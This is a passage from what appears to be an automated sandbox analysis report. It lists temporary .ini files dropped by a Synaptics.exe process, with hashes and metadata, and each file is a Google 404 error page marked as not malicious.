                                                                                                                            SHA-512:306582DC93B2E206C69DE1B84E178A4EDFE2F62813F51F7C2CBE82B660CCA3E7BE46DC4A5C73D283B7A468066F9F3B86767A8D7EC7AD51485F9934A436A6B0EA
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R-73Ssp20gV7rKqIi0X8ug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\B8rfrsi.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2682132299405335
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+01CSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                            MD5:5885C14A01670777EC56244E34408C46
                                                                                                                            SHA1:9269232BED5061802C5F5110ECDA69102A1D81A7
                                                                                                                            SHA-256:962D4593E23C18DE4EB3B86E3C0E4FD4F4678A735C9CACCC046D3A93AAEE71A4
                                                                                                                            SHA-512:37885B1036D1316A986B678301B71235837900EFB2865C88C31EF2199752B2F92BC1A9796AA7611260C3818040EB1DBE8C1DBBA7202B3FF844A5189EA0DCC5C4
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zActXSOgoDZikV0Lei6CEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\CoDoqkO.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.282235280566916
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+03bcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ac+pAZewRDK4mW
                                                                                                                            MD5:FD159DAF05474175AEB41A7CEBCC4E5F
                                                                                                                            SHA1:8D42795A15261169CC77165BB1DD1A81EAC8A898
                                                                                                                            SHA-256:C8CE7D8DD96123467E48E44EEDC7D0E97E2EBEA9F5D0028E1A6EAE866F97F0EA
                                                                                                                            SHA-512:49FA8F156762825DEB608CCD3F6EED068A9F3AE26E45634875ED87C4E24928A86A9CC768F2267BF3A24EBD108C41A5EFB7BA19B6B54DD98B84AA669093B8E017
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BvsN5UMUXqE_IBs8WECJEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\EfeXOFf.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.25327062012404
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+02PISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+DPI+pAZewRDK4mW
                                                                                                                            MD5:4197B8AE999FBB152962C33648FB62A6
                                                                                                                            SHA1:D33ABA3A19C2CB71BDD5C5267774AD0F4F3A1AF2
                                                                                                                            SHA-256:569411952949CEA4F258A0F1E2AFA452384F892DD0DD952497D1C84279C5C563
                                                                                                                            SHA-512:1467E305BBE027C69917D370B225AFE1AC664F8CE80A8AF362660DB6709600C59DCA2B2BCA8CDEF3E157D395E57BEB55CCD2CA083773741EC8ECC7AB604CEAB1
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qyxoMaazuxKziqJuz49wrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\EoeW2uD.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.251788955038448
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0amSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5m+pAZewRDK4mW
                                                                                                                            MD5:FADE6BBB609D46BB0B541C7F859B7D39
                                                                                                                            SHA1:9BE4AD5FBD50CD8AACE678530A29B3430964472C
                                                                                                                            SHA-256:539C91B09B59CB0B5BE52E904E5F5D5866BF811F7A44159269904CE696A2A677
                                                                                                                            SHA-512:AD951EB6A28FAB2B3DB04A7EF258F00B8BED850195A645F8002D469F522622238E6F11F0F035652923FAA0E0ED06B8F02ABDA53DC016974619D27EF41829D92D
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IVz3ie9tT6nmX78Grl_ssg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\FB8XI9P.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.253104736851879
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                            MD5:AED4837AB3D860761D07B60FCCBE4DDA
                                                                                                                            SHA1:74D3C41F5DACAE0AA72995C38AA1B254A847314E
                                                                                                                            SHA-256:E3D8742F0586C1C3A05B3C25B517F629A278EA119FB3AF62B205F1D042539E3B
                                                                                                                            SHA-512:B9ACC00FA8125E30E78DA528EE991A204AE6D1F35590D397E9270C31A8A002316E233D304E589C3CEA179DC092D795812F8FBB57A5AEE01D83A8EFBB1EC83C10
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j6uF-lV4q9etK1i-tbn0RQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\FydyqVS.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.269352078418455
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+06r3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z3+pAZewRDK4mW
                                                                                                                            MD5:9600DA005EE1A8518393119B9F228B5A
                                                                                                                            SHA1:94DBA624ADE5BF7A35B6647C3AC111CF7708F2C5
                                                                                                                            SHA-256:D60593D448D4ADAA51CD0445983A3A5992F671F5137A0E6EA6F477C38DB8202B
                                                                                                                            SHA-512:90E61711A040EF573A60079C56F1585562ABB99D10091C3853B660DF5CF48F0754A0CF2D8A73B12CE9D831C0598F04AA59E819EE4E44ACDBD6A282F4EA8C74B1
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="G1JdCygGKIx84NaNFH5b6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\HFLffRf.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.269961971056217
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0hDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                            MD5:824A78769659DC98038EC7EEFD490364
                                                                                                                            SHA1:D3D28ABEAA1E88BB86EB5ECFADC95479108DDF00
                                                                                                                            SHA-256:4B13E459BAEA3A46277DE476134090B97FE1C43B5E378DFA0C858919197C1264
                                                                                                                            SHA-512:615AEAB4B89531B72D3992D4CC6BBE21F7FE598E3179128F3E9ECEB6CB8E11F4202D6315CDFD31F775E6CF1DCC1DDC3CC1E19DD3EDC9705CD7322CCCDDEC3879
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XZRt2mfEL3PVerUB8MyESg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\IjDgC8H.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.258811316580052
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0EDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                            MD5:76E7F3DC87F7AD792D5BFD4281AF39A0
                                                                                                                            SHA1:5EA8BFA833FDDA0C102B05069C2FF00F009BB4C2
                                                                                                                            SHA-256:39BE2CAD899DD4AFDBA5BBFD1273BA125FA96003CE1C2342471A7B8DE3F57D25
                                                                                                                            SHA-512:53C0C4B77792A955B6B6F5C3503255ADDD42D703D2B5B5945A95002B6BAF0028F9600D3FE64B04E4BE916B7CADC42E2699088A3D1B0B5FF24F3C86B58B35B70C
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jJn8u8TDRrPwLbgddlT4GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\LDEQrYK.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2541275615953245
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0T3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w3+pAZewRDK4mW
                                                                                                                            MD5:9918B37C33F3F6B5D9917854C4BC2704
                                                                                                                            SHA1:2414E6FD72B693CEA1E857352339711DCE153182
                                                                                                                            SHA-256:4303BB02107C88A9EE69A55AAEE886D25ACF478ECFE20E9558F43ACDAE0576B3
                                                                                                                            SHA-512:81919BBDAE79C9C9EB7559CBBE21ADA3648AC1EA3DFB85564CE9B17F5995F5884C03788C5F43348118A1276B43425F49ED26B586E9A9ACB13B60430100272BA4
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="o6__m0FdiHf-6cheeINA6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\OLNNaqy.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.249097729917162
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0wRdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+pd+pAZewRDK4mW
                                                                                                                            MD5:F0413FB67667595769C2DB20AF57949A
                                                                                                                            SHA1:D2F061C28F1B2A623354721A3D44F512F9866BF6
                                                                                                                            SHA-256:E782EE1F35783A587DA2D9EBD1F3E0D7B6923B8AAD128DDFF4A08316701526EE
                                                                                                                            SHA-512:5450A71EEC1EA8A05F2213B358D946B3898E4FEDFEAFD4F0B6D954FC2CF8978192B8B643D2463EE457656AE2403D783B5EE44710628CDC5450455C349BC52F9F
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9y7UuIkVm80FEse2hlbt7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\OQUi53s.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.277610989295357
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                            MD5:E4C5C0D0486516976BDD560EF22DF6F5
                                                                                                                            SHA1:CFF5CAA25C039116887A3CE28A6AF9552F8EA133
                                                                                                                            SHA-256:57622CA7133CEFC278EE5DB86CAAB1F3E94423FEE2BD4102A46FF0369B123DD7
                                                                                                                            SHA-512:E3E1EB1F2FFD37715A2CCB8007E801F712D27FD06FAA67AB05103CBAD14F5783C6B141C7DA4ED3AA64EDE0CFD441C2CF7CF7494BF5DECE5A050173880BA42A21
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W73TVMFJT-KOHt43wuI7KQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\ObuXn7a.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.268880049840312
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                                            MD5:D5A0FACA8E5950BB9B7F4DD06837A44B
                                                                                                                            SHA1:CEEC0A11973BA7934E1959A5FFE7A49F6E7A97C4
                                                                                                                            SHA-256:194B22DA17C59B1DFF7D4B1B5EEAF60083B812D3421F9FF103E67C1C8FD86380
                                                                                                                            SHA-512:C9FD3F87388AEDD4C2D7ABEB7D0C0A77409C92887AAB1755AF354CABA2BDC387114867F5EFFD0B3264838D1F7A5304417734C5480CFBAF2AA31CE0642049574E
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mA21lBacwMJ9UBIFCxNVpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\OgGLMuW.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.255714012439686
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                                            MD5:1EEBFADBA18DFB506E0420F8444756BB
                                                                                                                            SHA1:40605882060362A5862913F7AE626BF089E3C459
                                                                                                                            SHA-256:C485B54618060E2C7718DDFB64DF636D1D4FE13FDB17A08E5517643D842111C5
                                                                                                                            SHA-512:7B0E1EA59EA021F043DBBC20D5436CC6DBA93A344F947138FF12B3AE3CB1E22F126CE177895D016F3CEC69EC05BAD033A9C48B48078CA8948556DCB7695A694F
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nHpy80LpEGzUaiLtg3KGtQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\OiLtvCe.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.276235334115814
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0yvfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                            MD5:39A3E1336A247D1EFCAE96DC29AC6A82
                                                                                                                            SHA1:04991093B7FEED613D52BEDDA4CFA14926F84A9C
                                                                                                                            SHA-256:907EEFF9EADF65E631E4B6B0280E2703641E91F0D8EC27D3E1006AE0D7DAF889
                                                                                                                            SHA-512:B62F7A8F2BB2A0CB459DF96EE4707DA28AC477D468D4381572C84C82E3D155D8A6BB8E21CE093CF18A31D45B74634062BCBCEBC660213D7D08DAFCA386D76F80
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4BBBklN3E4NOIcKvDFHBQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\OxAsZGl.ini

                                                                                                                            Download File
